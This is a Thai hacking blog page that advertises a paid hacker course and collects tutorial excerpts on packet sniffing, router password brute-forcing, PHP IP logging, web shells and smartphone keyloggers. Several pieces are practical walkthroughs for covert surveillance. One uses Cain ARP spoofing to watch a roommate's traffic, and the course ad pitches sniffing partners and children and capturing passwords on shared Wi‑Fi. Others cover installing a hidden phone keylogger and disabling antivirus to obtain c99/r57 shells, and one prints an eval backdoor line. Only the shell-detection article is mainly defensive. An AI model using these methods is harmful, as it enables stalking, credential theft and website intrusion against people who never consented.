คอร์ส hacker&Security สำหรับคนทำเว็บ /เรียนสายคอมห้ามพลาด

คอร์สเรียนออนไลน์ Hacker & Security


รูปแบบที่ 1 - คอร์สเรียนออนไลน์
ผ่านFacebookและ Teamviewer
-สอนแบบ Step by step สมาชิกได้ลงมือทดลองเองทุกขั้นตอน
-ไม่จำกัดระยะเวลาเรียน และจำนวนครั้งที่เข้าเรียน
-ว่างตอนไหนสามารถออนไลน์มาเจอเราและลงคอร์สต่อเนื่องจากครั้งก่อนได้ทันที
-เรียนผ่านแชท Facebook เพื่อเก็บบันทึกสนทนาทบทวนหลังจบคอร์ส&Teamview ตามสะดวก
-สมาชิกสามารถกำหนดวันลงเรียนเองได้ตามสะดวก
-ติดตั้งโปรแกรม Team view เพื่อเข้าไปสาธิตได้ถึงหน้าจอ


รูปแบบที่ 2 : Ebook (หนังสือเรียนออนไลน์)
(อยู่ในช่วงดำเนินการครับ)


หัวข้อที่เปิดสอนในคอร์ส

-sql injection
ช่องโหว่ Sql injection
ช่องโหว่ที่ทำให้ Hacker สามารถแฮกข้อมูลใน Database ได้(*Manual,Step by step)
เพื่อการป้องกัน และเช็คหาช่องโหว่บนเว็บไซต์

-[xss] cross site scripting
-cookie steal เทคนิคการขโมย Cookie ของ Hacker
และวิธีการป้องกัน
-Xss และอันตรายต่อ search engine
-Find Redirect page , ความเสี่ยงเพิ่มขึ้นต่อการโดนแฮกแบบ Cookie steal

-Phishing
(ที่โดนแฮก ID เกมส์ และโดนแฮก Email , โดนแฮก facebook กันบ่อยๆ)
และเทคนิคที่ User ทั่วไปมักหลงกล phishing จนโดนแฮก

-รู้จักกับ Exploit
เรียนรู้กับช่องโหว่ของเว็บบอร์ดสำเร็จรูป Smf,discuz,phpbb,wordpress ลฯล ที่เคยถูกค้นพบ
Exploit ต่อยอดการเรียนรู้ ด้านช่องโหว่
รู้จักกับจุดอ่อนของเว็บไซต์

-วิธีการและการปลอมแปลง ip ของแฮกเกอร์
ปลอม IP,Hide ip   = Manual  & Tools และหลักการทำงาน

-Sniffer สืบบุคคลในวงแลน
สืบแฟนเข้าเว็บอะไร , ลูกชายเล่นคอมพ์ทั้งคืน อยากรู้ว่าเข้าเว็บอะไร
เข้าดูเว็บไหนตอนใช้คอมพ์  รวมไปถึงดักรหัสผ่านภายในวงแลนและใน Wifi
Sniffer จะทำให้คุณเป็นแม่บ้านนักสืบและ พ่อบ้านนักสืบ ที่สังเกตุการคนทั้งบ้านในอย่างอยู่หมัด

-รู้จักกับ Shell
คุณสมบัติของ Shell และความสามารถในการใช้งานพร้อม Shell ตัวอย่าง
รู้จักกับ Shell และความอันตรายที่ใช้ในการควบคุมเว็บไซต์ต่างๆที่แฮกเกอร์สามารถเจาะเข้าไปได้
เช่นการแก้ไขหน้าเว็บไซต์(Deface) การ Dump password(ขโมย Password ในดาต้าเบส)

-ตรวจสอบหา Shell บนเว็บ
เทคนิคการตรวจสอบหาไฟล์ Shell ที่ Hacker Upload ขึ้นมาบนเว็บ
กรณีเว็บโดนแฮก , คนทำเว็บ ควรรู้ไว้ มักได้เปรียบ


ลดพิเศษ จาก 2650.เหลือ 1500.- *
สามารถชำระเป็นบัตรเติมเงินทรูมันนี่ได้(+vat10%)

ติดต่อ Facebook Profile  
http://www.facebook.com/profile.php?id=100005505336690
หรือโทรติดต่อ



*เสริม  เทคนิคที่ใช้ในการสอนคอร์สตามด้านบน 
ไม่มีจุดประสงค์ในการนำไปแฮกและสร้างความเดือดร้อนให้แก่ผู้อื่น
แต่เพื่อเป็นการเริ่มต้น และแนวทางในการต่อยอดในทางที่ดีต่อไปครับ


ขอขอบคุณจาก basic-hack



Read more

อยากเป็น HACKER โปรดอ่านก่อน

 (โปรดอ่าน !!)หากอยากทำความรู้จักกับ Hacker    

 สอนแฮก =  สอนให้แฮกเป็น และประยุกค์นำไปใช้ในทางที่ดี 
ดีกว่าอ่อน Security จนโดนเขาแฮก

ทำไมทุกคนถึงค้นหา การ สอน hacker
ที่มาของคีย์เวิร์ดที่ใช้ของเว็บนี้เป็นคีย์เวิร์ดที่ใช้เลือกใช้ดึงหลายๆคนเข้ามาใน Basic-hack แห่งนี้
เกิดจากการใช้แนวคิดในแง่มุมตอนที่ผมเริ่มหัดเรียนรู้ในด้านนี้ใหม่ๆ (hacker)
จากคนที่มีความคิดในทางลบ
Basic-hack จึงอยากดึงคนเหล่านี้มาที่นี่...เพื่อปรับเปลี่ยนแนวคิด
ในคำว่า แฮก ของ คนกลุ่มนี้.... ให้ไปทางที่เกิดประโยชน์กับสังคม IT ต่อไป....
และกลายเป็นคำว่า  Security.........ผมเชื่อว่าทุกคนต้องเคยผ่านคำว่าเกรียน
แต่ที่แห่งนี้จะเป็นที่แรก ที่จะ สอน hacker
ในรูปแบบที่ทำให้เกิดความสนุก รู้สึกอยากค้นคว้าเพื่อป้องกัน
และเป็นสกิล Security ติดตัวของเด็กคอมพ์เพื่อพัฒนาไปในทางที่ดีต่อไป


ยกตัวอย่างให้เห็นกันง่ายๆก่อนจะเลือกทางเดิน
    นาย ก =  เจอช่องโหว่ของเว็บไซค์ > นาย ก. แฮกได้
                       นาย ก. แจ้งช่องโหว่ ของเว็บ พร้อมยื่นข้อเสนอ ช่วยแก้ไข
                       นาย ก. ทำสำเร็จ มีชื่อในองกรณ์ ในบริษัท ได้เครดิตที่ดีและอาจมีงานมารอคุณ
     นาย ข .  =   เจอช่องโหว่ของเว็บไซค์
                        นาย ข. แฮกได้งานได้เครดิตที่ดีและอาจมีงานมารอคุณ
                        นาย ข. แฮกข้อมูล  Username password , และทำการเสียหาย
                        นาย ข.ถูกจับ ติดคุก...
                        นาย ข.มีชื่อเสียง (ในคุก) เป็นที่รู้จักใน เรือนจำ


หากทุกท่านพร้อมที่จะเรียนรู้อยู่บนความถูกต้อง 
และเข้าใจตรงกันแล้วสามารถเลือกอ่านได้ตามความชอบ
ในแถบเมนูด้านบนหัวเว็บไซต์ครับ
แฮก


Read more

Sniffer สืบเพื่อนสาวติดคอมพ์ด้วยโปรแกรม Cain


สิ่งที่ไม่ควรทำหลังจากอ่านบทความจบ
-ไม่ควรนำไป hack facebook แฟน
-ไม่ควรนำไป hack facebook เพื่อน
-ไม่ควรนำไป hack facebook คนใกล้ตัว
-กรณีจำเป็นใช้สืบได้ อย่าให้เกินเลย เพราะหากแฮกแล้วเข้าไปใน facebook ของคนอื่นแล้ว
คนที่โดนแฮกสามารถนำ log ip ที่เข้ามา login facebook ไปแจ้งความดำเนินคดีได้

บทความนี้เกี่ยวกับการทำ Packet sniffer การดักจับข้อมูล packet 
 ที่วิ่งอยู่ในเครือข่ายคอมพิวเตอร์  ด้วย โปรแกรม Cain 
บทความนี้ไม่แนะนำให้นำไปปฏิบัติในทางลบ จึงสาธิตการใช้งานแค่ขำขำ เท่านั้น (ตอบสนองปัญหา ลูกไม่ยอมนอนเล่นคอมพ์ทั้งคืน , แฟนเล่นแต่โทรศัพย์ , พี่ชายเล่นคอมพ์ทั้งคืนไม่ยอมนอน , ลูกติดคอมพ์ )



ขั้นตอนแรก ทำการติดตั้งโปรแกรม Cain & Abel
Download Cain & Abel


เมื่อติดตั้งโปรแกรม Cain เสร็จแล้วเลือกที่แถบ Sniffer และกดที่ ปุ่ม  Start / Sniffer [ตามรูป]


และกดที่เครื่องหมาย + (add to list) และกด ok เพื่อทำการ Scan Mac Address ภายใน Network
เสร็จแล้วจะได้  IP , MAC address , OUI fingerprint
ขั้นตอนนี้ผมสแกนแล้วเจอ IP ของเพื่อนสาวร่วมหอกำลังใช้งาน 3BB Wifi ด้วย Apple Mobile อยู่ด้วย


ขั้นต่อไป ไปที่แถบ > ARP และกดเครื่องหมาย +  (Add To list) อีกครั้งเสร็จแล้วเลือก
Ip address (ip ประจำเครื่องตนเอง)  >  Target Address (เป้าหมาย)
(เช็ค ip เครื่องตัวเองเข้า Start > Run >พิม cmd กด ok > พิม ipconfig กด ok )
เสร็จแล้วทำการกด  Start ARP (ปุ่มเหลืองข้างๆ Start sniffer)

ผ่านไป 10 นาที มีการตอบสนองจากอุปกรณ์ Apple Mobile (ip 192.168.1.4)
มีการรับส่งข้อมูลกับ ip 331.13.79.1 (ลองเข้าแล้ว Redirect ไปที่ www.facebook.com)
*ขั้นตอนนี้เพื่อนสาวเข้าใช้งาน facebook ผ่าน HTTPS
โปรแกรม Cain จึง Sniffer ได้มาแค่เพียง ip เท่านั้น (รู้เท่านี้ก็พอแล้วหล่ะ = =")
ตามรูป

ก็ยังไม่แปลกใจอะไรจึงทำการ Sniffer ต่อไป
และเวลาได้ผ่านไปประมาณ 20 นาที คาดว่าเพื่อนสาวคงเบื่อจากการเล่น Facebook และหันไปหาสิ่งน่าสนใจอื่นแทนนั่นคือ


บทความโดย  Ak1






Read more

Hack Wifi&Router ด้วย Android App [&pc] - Password Brute force&Cracking

วันนี้จะมาเสริมต่อเนื่องโดยการใช้ App ของ Android ทดสอบทำการโจมตี
ด้วยเทคนิค Password Guessing เป็นการถอดรหัสโดยใช้ Default password router in thai
และพาสเวิร์คที่มีความน่าจะเป็นไปได้ เช่น 123456789 , 999999999 - ลฯล
และการ Brute Force Router เป็นการกู้รหัสผ่าน Router หรือ กู้รหัสผ่าน Wifi สำหรับคนที่ลืม แต่ยังจำได้เลือนๆลางๆ



ขั้นตอนแรก Download App Android ชื่อว่า Router Password Recover
"สำหรับคนที่ไม่มีมือถือ Android ไม่ต้องเสียใจครับ สามารถทำบน PC ได้
( รันแอพ Android บนคอมพิวเตอร์ทำได้ง่ายๆ มีหลายโปรแกรมให้เลือกใช้ด้วย )


ขั้นตอนต่อไป
ให้นำไฟล์ Default password router.txt  ( http://notes.io/jBw )
หรือรวบรวมจากบทความที่ผ่านมา
 รหัสผ่านของเราเตอร์แต่ละรุ่นที่มีในไทย [Default password router in thai]
http://basic-hack.blogspot.com/2013/07/default-password.html
ไปใส่ไว้ในหน่วยความจำภายในบน Android


.....หลังจากนี้มาดูในส่วน App Router Password Recover กันบ้างครับ
ในแถบ Dictionary ให้เลือก Select Dictionary ไปยังไฟล์  Default password router.txt ที่อยู่ในหน่วยความจำภายในของเครื่อง 
ในช่อง URL  จะเป็นเลข Default Gateway สามารถเช็คได้โดยการ
เข้า Start > run > cmd > พิม ipconfig  และดูในช่อง Default Gate way ครับ


การ Hack pass Router ด้วยวิธีนี้ถือเป็นอันตรายต่อผู้ที่ยังใช้ Default password ของเราเตอร์เป็นอย่างสูง
แต่ยังป้องกันได้ในระดับเริ่มต้นคือการ การตั้งรหัสผ่าน Wifi ก็ถือเป็นการป้องกันในระดับเริ่มต้นครับ




ต่อมา ในแถบ Brute force  เราสามารถใช้ประโยชน์กับแถบนี้ได้ในกรณีลืมรหัสผ่าน เช่น Username เรารู้อยู่แล้วว่าคือ admin ส่วน Password เราจะกำหนดใน ช่อง Charset
ให้เป็น 0-9 ในกรณีรหัสผ่านเป็นเบอร์โทร 02xxxxxxx หรือ 03xxxxxxx ที่เป็นเบอร์บ้านครับ
Start at จะเป็นการกำหนดค่าให้เริ่ม Brute force  เช่นใส่ 020000000 App จะเริ่ม Brute force
ตั้งแต่ 020000000 ไปจนถึง 029999999  ยิ่งเราแบ่งกันทำงานอาจจะได้ผลลัพธุ์

เช่น 
เครื่องที่ 1  Brute force  021000000 
เครื่องที่2  = 022000000 จะทำให้ได้ผลลัพธุ์ที่เร็วขึ้น


ทั้งนี้การ Hack Wifi หรือ Hack router แบบใช้ 
App บน Android ก็ยังไม่มีความเสถียรในเรื่องความเร็ว
ในการประมวลผลได้เท่า PC หรือคอมพ์พิวเตอร์ทั่วไปอย่างแน่นอน

บทความโดย Ak1 - www.basic-hack.blogspot.com
กรุณาแนบลิงค์และให้เครดิตทุกครั้งที่คัดลอกบทความครับ
Read more

ดัก ip แฮก ip จริงแล้วเขาทำกันยังไง - php ip log

php ip log เพื่อการศึกษาเท่านั้นครับตอบโจทย์ให้คนที่สงสัยเรื่อง การhack ip , การดัก ip

สมัยก่อนที่ยังมี MSN เรื่อง Hack ip จะเป็นที่สนใจมาก โดยเฉพาะ  IP GET ส่วนเสริมของ Msn Plusหรือไม่ว่าจะเป็นการใช้ netstat ในตอนส่งไฟล์ ในปัจจุบันก็ยังมี Facebook ที่เรียกว่าเป็น Social network ที่มีความเสี่ยงในเรื่อง php ip log ด้วย ทีนี้เรามาดูโค้ดกันชัดๆ ตอบโจทย์ให้คนที่สงสัยเรื่อง
การแฮก ipการดัก ip


อุปกรณ์
-Appserv  (หรือโฮสฟรี)
(ขั้นตอนการติดตั้ง Appserv)
-หรือโฮสฟรี สำหรับอัพไฟล์ .php และ log.txt ขึ้น


อธิบาย Code php ip log แบบง่ายๆ
ให้มองเห็นภาพทีละบรรทัดสำหรับคนที่อยากศึกษา

[CODE]
<?php
$file = 'log.txt'; 
$ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
$fp = fopen($file, 'a'); 
fwrite($fp, $ipaddress); 
fclose($fp);
?>

// อธิบายโค้ด //
$file = 'log.txt';   
$file จะเป็นตัวกำหนด logfile ที่จะใช้เก็บค่า ip (ที่อยู่ในโฟล์เดอร์เดียวกัน)
ขั้นแรกเราสามารถใช้  $ _SERVER ['REMOTE_ADDR'] เก็บ ip ของผู้ใช้งานปัจจุบัน
และอย่าลืม \r\n เพื่อผลลัพธ์ที่ออกมาใน log  ออกมาเป็นบรรทัด
$ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
$fp=fopen($file, 'a'); 
เป็นการเปิดไฟล์ที่กำหนดชื่อในตัวแปรของ $file  
$fp = fopen($file, 'a');
โดยกำหนดโหมด 'a' คือการเปิดเพื่อเขียนเท่านั้นและจะสร้างไฟล์ขึ้นใหม่ถ้าไม่มีไฟล์
และเขียนลงในไฟล์ด้วย fwrite($fp, $ipaddress);
ในกรณีที่ใช้ fopen ให้ใช้  fclose ปิดท้ายเพื่อมันใจว่า ip ได้ถูกเขียนลงใน log
fclose($fp);
////////////////////////////////////////////////////////////////////////////////////////////////
นอกจากนี้เรายังเก็บค่าอื่นๆเพิ่มได้อีกเช่น  
$date = date('d/F/Y h:i:s');
เก็บค่าวันที่เข้าชม

 ข้อมูล Browser ของผู้เข้าชม
$browser = $_SERVER['HTTP_USER_AGENT'];

[CODE]
<?php
$file = 'log.txt'; 
$ipaddress = $_SERVER['REMOTE_ADDR'];
$date = date('d/F/Y h:i:s');
$browser = $_SERVER['HTTP_USER_AGENT'];
$fp = fopen($file, 'a'); 
$fwrite($fp, $ipaddress.' '.$date.' '.$browser"\r\n"); 
fclose($fp);
?>


สุดท้ายฝากไว้สำหรับคนชอบศึกษาหรือติดตามข่าวสารวงการแฮกเข้ามาทักทายกันได้ที่
https://www.facebook.com/ibasic.hack

บทความโดย Ak1  http://basic-hack.blogspot.com
กรุณาให้เครดิตหรืออ้างอิงลิงค์นี้
ทุกครั้งที่คัดลอกบทความ





Read more

ตรวจสอบเว็บโดนแฮก - การสร้างประตูหลังของแฮกเกอร์

จะทำอย่างไรเมื่อ เว็บถูกแฮกและจะทำอย่างไรให้รู้ว่า เว็บโดนแฮก

Security web site - การสร้างประตูหลังของ hacker 
ในการแฮกเว็บและการตรวจสอบ 



ตรวจสอบความปลอดภัยเว็บ


แฮกเกอร์ แฮกเว็บจากทางไหน...
ในการตรวจสอบเว็บไซต์เราโดนแฮกจากทางไหน...ท่าทางจะเป็นไปได้ยาก
ถ้าหากไม่รู้ก่อนว่าถูกแฮก
แล้วเราจะรู้ได้อย่างไรว่าเว็บเรา "โดนแฮก" เข้าให้แล้ว...
การตรวจสอบดู LOG  ก็เป็น 1 วิธี แต่จะแนะนำ ณ.ที่นี้ เป็นขั้นตอนที่ 2 
หลังจากทราบว่าถูกแฮก

เป้าหมายของ HACKER
เป้าหมายของ แฮกเกอร์ทุกคนหวังในความสำเร็จในการแฮกเว็บ แต่ละเว็บ
คือการวาง Shell  ซึ่งที่ใช้กันแพร่หลาย ได้แก่  c99.php  r57.php (c99 คืออะไร >>C99.php<<)
และอาจเปลี่ยนชื่อไฟล์ไปต่างๆนานา เพื่อความเนียน และตรวจสอบได้ยากของ Admin


บทความนี้จึงกล่าวถึงการตรวจสอบ ไฟล์ Shell  
ที่ใช้ในการแฮกเว็บของ hacker ว่ามีใครแฮกเข้ามาบ้าง



ตรวจสอบได้โดย


1.วันที่ / ปีที่ ทำการอัพโหลด
แอดมินสามารถตรวจสอบเป็นประจำว่า ไฟล์ในเว็บเรานั้น อยู่ในปี พศ. อะไร
ตรงนี้จะตรวจสอบง่ายมาก ถ้ามีไฟล์ที่อัพโหลดใน พศ. ใหม่  ซึ่งไม่ใช่ ฝีมือของเราแน่นอน
2.ไฟล์ .php ทุกไฟล์ 
 ส่วนนี้ถ้าไฟล์ในเว็บไม่เยอะมากจะง่ายมากตรงนี้ ให้เราสังเกตุไฟล์ php
จากชื่อไฟล์...  hacker  อาจอัพโหลดไฟล์มาในชื่อ c99.php , r57.php โดยตรง
หรือมุข ที่ใช้กันแพร่หลาย  คือการเนียน ชื่อไฟล์ให้เหมือนกับไฟล์ในระบบ
เช่นไฟล์บนเว็บของคุณมี member.php
hacker อาจอัพโหลดไฟล์ Shell  ขึ้นมาในชื่อ members.php


+ เมื่อพบ Shell ในระบบ +


เมื่อพบ SHELL ที่แทรกทรึมเข้ามาในระบบของเราแล้ว...


ขอแนะนำให้ Admin ตรวจสอบ Log หาที่มา โดยใช้ชื่อไฟล์ Shell
เป็นตัวนำทาง  ตรวจสอบ ว่า User คนไหนในเว็บ  หรือ ip ไหนที่ทำการ อัพโหลดไฟล์นี้ขึ้นมา...
และตรวจสอบขั้นที่สอง  ว่า USER คนนี้ หรือ IP นี้ อัพโหลด SHELL นี้มาจากทางไหน
และเพื่อความละเอียดยิ่งขึ้น  ดูให้หมด ว่า  นาย USER หรือ ip  ของ hacker นี้
ได้เดินทางในเว็บของเราไปที่ไหนบ้าง
จนทราบถึงของการถูกแฮกของเว็บไซค์

เกร็ดความรู้
Shell บนระบบที่ hacker อัพโหลดขึ้นมาได้นั้น...
ไม่ได้มีเพียง 1 ไฟล์ แน่นอน
และบางไฟล์ไม่สามารถเข้าถึงได้เนื่องจาก hacker อาจตั้งรหัสผ่านไว้
หรืออาจมาในรูปแบบ <?eval
<? eval($_SERVER['HTTP_BASICHACK']);  ?>


หน้าตาของ C99.php และ R57.php  คร่าวๆ

R57.php


c99.php

บทความโดย Ak1 : www.basic-hack.blogspot.com







Read more

Sniffer ดูการทำงานของ"โปรแกรมแฮก"อย่าง Havij

เทคนิคการ Sniff เพื่อดูการทำงานของโปรแกรมแฮก ที่กำลังแพร่หลายที่ชื่อว่า "Havij"


Havij ถือเป็น Sql injection tool (โปรแกรมแฮก)ตัวหนึ่งที่
(ผมขอใช้คำว่า Script kiddie) นะครับ
นิยมใช้งานกันอย่างแพร่หลายในไทย และก็ทราบเป็นที่แน่นอนว่า 
"มันไม่ได้ต่อยอดความรู้อะไรให้แก่ตัวเราเลยซักนิดเดียว"

วันนี้จะขอมาแนะนำวิธีการ Sniff เพื่อที่จะสามารถ
แกะและดูวิธีการทำงาน  หรือการ Query คำสั่งต่างๆของ ตัวโปรแกรมนี้กันครับ
เพื่ออ่านการทำงานของคำสั่งและศึกษาได้ว่า โปรแกรมแฮกนี้ติดต่อและทำอะไร ?

STEP 1  Download & Install
3.Firefox [add-on]Hack bar

STEP 2  Open Wireshark
เปิด Wireshark เลือกแถบ Interface หรือ Interface List
และติ๊กเครื่องหมายถูกในช่องของ Device ที่มีการรับส่ง Packet วิ่ง 
หรือเป็น Interfaces ที่ใช้งานปัจจุบัน เสร็จแล้วกด Start เพื่อทำการ Sniff รอไว้ได้เลยครับ

STEP 3  Open Havij
และทำการ Attack site หรือใช้โจมตีไปยัง URL Parameter 
ที่มีช่้องโหว่ Sql injection [แนะนำให้ทำบน localhost เพื่อความปลอดภัยครับ ]
(ใน STEP นี้ใครยัง งง)
แนะนำให้หาอ่าน "How to Sql injection step by step"
หรือถ้าไม่เข้าใจจริงๆ แนะนำให้สมัครคอร์สออนไลน์
Hacker & Security ในหัวข้อ Sql injection ได้เช่นกันครับ
http://basic-hack.blogspot.com/2013/01/hacker.html )

STEP 4
เปิด Wireshark ที่เรา Sniff ทิ้งไว้ขึ้นมาแล้วกด Stop ครับ
ในช่อง Filter : ให้เราใส่คำว่า http เพื่อเลือกดูเฉพาะ http protocol เท่านั้นครับ
จะง่ายต่อการ สังเกตุในช่อง Info เราจะเห็นลิงค์ URL ยาวๆที่ต่อท้ายด้วย union+all+select
ให้คลิกขวา เลือก Copy > Summary (Text) และนำไปวางใน Hack bar
เพื่อทำการ Decode URL ออกมาเป็นที่เรียบร้อย ตาม VDO Clip ด้านล่างครับ


บทความโดย Ak1 -  http://www.basic-hack.blogspot.com
คัดลอกบทความ กรุณาให้เครดิต หรือแนบลิงค์ชี้กลับมาที่
http://basic-hack.blogspot.com/2013/12/sniffer-havij.html
Read more

Step Hack website - ขั้นตอนของการแฮกเว็บหนึ่งเว็บ

ขั้นตอนของการ Hack website แบบ Step by Step เพื่อเป็นแนวทางสำหรับการศึกษาและหาทางป้องกันโดนแฮกกันต่อไปครับ

สำหรับผู้ที่อยากทราบว่าทำไมเว็บถึงโดนแฮก ก่อนจะโดนแฮกเว็บจะผ่าน
วิธีการขั้นตอนใดใดบ้าง

ก่อนอื่นอ่านบทความเพื่อสร้างความเข้าใจ
ก่อนที่จะ> สอน Hacker <

ขั้นที่ 1 ping web เพื่อหา ip ของเว็บ
ทำไมต้อง ping web ก่อนจะแฮก ต้องเช็ค ip
ของเว็บก่อน เพื่อทำการสืบค้นข้อมูลต่อไป

*excample
[Start > Run > พิม cmd แล้ว enter > พิม ping ชื่อเว็บ]  และ Enter

ขั้นที่ 2 Reverse ip
เมื่อหา ip ได้แล้ว นำ ip ที่ได้ไป Reverse ip เพื่อหา Website อื่นๆ ที่อยู่บน server เดียวกัน
และเก็บเป็น Website Target list (เว็บเป้าหมาย) 

ถาม :ทำไมต้องตรวจสอบเว็บอื่นบน Server
ตอบ :เว็บเป้าหมายหากตรวจสอบแล้วแฮกเกอร์ไม่สามารถ แฮก เข้าไปได้ เป้าหมายต่อไป
จะเป็นเพื่อนร่วม Server จะถูกแฮกเข้าไปฝัง Shell และมีโอกาสที่สามารถเข้าไป
ยังเว็บไซต์เป้าหมายหลักได้เช่นกัน

ดังนั้น สรุปได้ว่า หากเว็บไซต์ที่มั่นใจในด้านความปลอดภัย แต่ยังตั้งอยู่บนเครื่อง Server 
ที่ให้บริการส่วนรวมมีเว็บอื่นๆรวมอยู่ด้วย ความปลอดภัยก็ยิ่งลดน้อยลง

ขั้นที่ 4 หา Exploit
ในที่นี้ข้อให้ความหมายของคำว่า Exploit หมายถึง 
รายงานช่องโหว่ หรือบัค ที่แฮกเกอร์ตรวจสอบพบ
บน cms เว็บบอร์ด หรือ ปลั๊กอิน เวอร์ชั่นต่างๆ และได้ทำการแจ้งต่อผู้ดูแลระบบ และนำมาเผยแพร่
แฮกเกอร์จึงใช้วิธีนี้ก่อน (เพราะไม่ต้องออกแรงหาช่องโหว่ของเว็บไซต์เอง)

ขั้นที่ 5 vulnerability test
หมายถึงขั้นตอนการหาช่องโหว่เว็บ ขั้นตอนนี้ขึ้นอยู่กับ
เทคนิค + ความรู้ + ความสามารถ + Skill ของแต่ละบุคคล ว่ามีกลเม็ดเคล็ดลับวิชาเพียงใด
หากเป็นเว็บที่มีช่องโหว่ที่ เคยทดสอบ และผ่านมือมา ก็จะผ่านขั้นตอนนี้ไปได้ง่ายๆ
หรืออาจใช้  Hack tools (โปรแกรมแฮก)
สิ่งที่คุณต้องทำก็แค่การ หา ip และการคลิกเพื่อใช้งานมัน
หลายๆคนเรียกบุคคลกลุ่มนี้ว่า Script Kiddies

ตามรูปจะเป็นรวมรายชื่อช่องโหว่และ % ความเสี่ยง
รูปภาพจากแฟนเพจพี่หนุ่ม https://www.facebook.com/icheernoomfanpage

ขั้นที่ 5 Upload Shell
ก่อนอื่นแนะนำ ก่อนนะครับว่า Shell(หอย) ในภาษาของแฮกเกอร์นั้นคืออะไร อ่าน> Shell คืออะไร
เมื่อ Shell ถูกฝังเข้าไปอยู่ในเว็บแล้ว สามารถตรวจสอบได้โดย อ่าน > เว็บโดนแฮก


หมายเหตุบทความนี้เป็นเนื้อหาในระดับเบสิกและพื้นฐานเพื่อสร้างความเข้าใจเกี่ยวกับ hacker
Ak1 - http://www.basic-hack.blogspot.com
Copy บทความกรุณาให้เครดิตมาที่เว็บด้วยครับ




Read more

Keylogger On iphone,android,BB,ipad



ผู้ใช้งาน Smartphone สามารถดาวโหลด และทดสอบ Keylogger เพื่อทราบถึงอันตรายของ Kidlogger โปรแกรม Keylogger บน Smartphone ได้ตามบทความด้านล่าง


1.Download Kidlogger & Soft keyboard pro
เลือกติดตั้งได้ทั้ง ios,android รวมไปถึง BB ด้วยครับ
สามารถเข้าไปโหลดได้ที่  http://kidlogger.net/download.html 
(ใน play store ไม่มีให้โหลดแล้ว)

2.สำหรับ Android
ให้ติดตั้ง   KidLoggerKeyboard 1.3.apk     และ    KidLogger 1.4.apk  คู่กันครับ

3.ตั้งค่า Keyboard
ให้เลือกใช้งาน Soft keyboard pro เสร็จแล้วเข้าที่ Soft Keyboard pro
รหัสผ่านดั้งเดิมจะเป็น *123456# เสร็จแล้ว Launch kidlogger
จะเข้าสู่หน้าจอของ Kidlogger  และสามารถเริ่มต้น Kidlogger ได้เลยครับ

จุดสังเกตุในการป้องกัน
Kidlogger จาก Keyboard screen ถ้าเป็นในรูปแบบตามรูปด้านล่าง
อย่าเพิ่งกรอก ข้อมูลต่างๆบน โทรศัพย์ครับ

อ่านแล้วไม่เข้าใจลองดู VDO นี้ตามครับ



[บทความนี้แสดงให้เห็นถึงความปลอดภัย
ในการใช้งานบนมือถือของคนอื่น]
ควรระวังการถูกกระทำ Keylogger  จากเจ้าของ Smart phone ใกล้ตัว
มิได้มีเจตนาในการชักนำเพื่อการโจรกรรมข้อมูลต่างๆครับ

คัดลอกบทความกรุณาแนบเครดิต
Ak1 - http://basic-hack.blogspot.com/2013/06/keylogger-on-iphoneandroid-and-ipad.html
Read more

มือใหม่หัดแฮก "Shell คืออะไร"

SHELL คือ? สำหรับคนที่กำลังเริ่มต้น
คงยังไม่ได้ทำความรู้จักกับเจ้า shell / หอย

ซึ่งเป็นสิ่งหนึ่งที่สำคัญมากในการแฮก server , host , web ลฯล รวมไปถึง
การแฮกเซิฟเวอร์เกมส์เถื่อนด้วยเหมือนกัน
ซึ่งถ้าคนที่พอรู้จักมันแล้ว  หลายๆคนอยากจะมีไว้ซัก 1 shell ไว้ครอบครอง

Shell คือ? จะอธิบายเป็นภาษาบ้านๆเพื่อไม่ให้เข้าใจยาก
มันก็คือไฟล์ php ที่เราสามารถ สั่งใช้งาน upfile / loadfile /ลบไฟล์ สร้างไฟล์ ดูโค้ดไฟล์
เข้าได๊ D:/  ออกได๊ C:/  ไปยัน dump database..ได้  เมื่อเจ้า shell ขึ้นไปอยู่บนเว็บของใครผู้โชคร้าย
ผู้ใช้งาน shell ก็จะมองเห็นไฟล์ทั้งหมดบนโฮสนั้นรวมไปถึงกับแก้ไขไฟล์และการแก้ไขหน้าเว็บนั้นๆด้วย

Shell ที่นิยมใช้กันทั่วไปจะมีชื่อว่า   C99.php  และ R57.php
หาโหลด ได้ตาม google ทั่วไป
ดาวโหลด Shell เพื่อทดสอบ ระบบ ได้ที่
(ต้องปิด Antivirus ก่อนนะครับ)
เพราะเจ้าพวก ไฟล์ Shell พวกนี้ถ้าไม่ได้ทำการ encode เข้ารหัส
แอนตี้ไวรัสจะเด้งเตือน ทันที(เพราะ Antivirus ทุกตัวก็จะรู้จักกับเจ้า Shell หลายๆตัวเป็นอย่างดี)
หรือบางที (ส่วนมาก) โดนฝังโค้ดอันตราย *เว็บไหนไม่เคยโดนแฮก
แต่ดันเอา Shell ไปขึ้นเว็บไว้ก็อาจโดนตามมาจากเจ้าของ Shell หรือ Hacker คนอื่นๆ
ได้เหมือนกันครับ

..มือใหม่ทุกท่านหากรู้จักเจ้า หอยเชลกันบ้างแล้ว ลอง Download มาหัดใช้กันใน appserv ดูนะครับ :)
 (หากอัพขึ้นเว็บจริงๆแล้วชื่อไฟล์จะถูกเปลี่ยนแปลงไปตามความต้องการของ Hacker)

           [ตัวอย่าง c99.php ของจริง]
           http://corz.org/corz/c99.php 
(เป็นกรณีศึกษาจะไม่สามารถใช้งานได้นะครับ) 

บทความโดย : Ak1



Read more
X Hacker-Security (Online course - Ebook)for sale!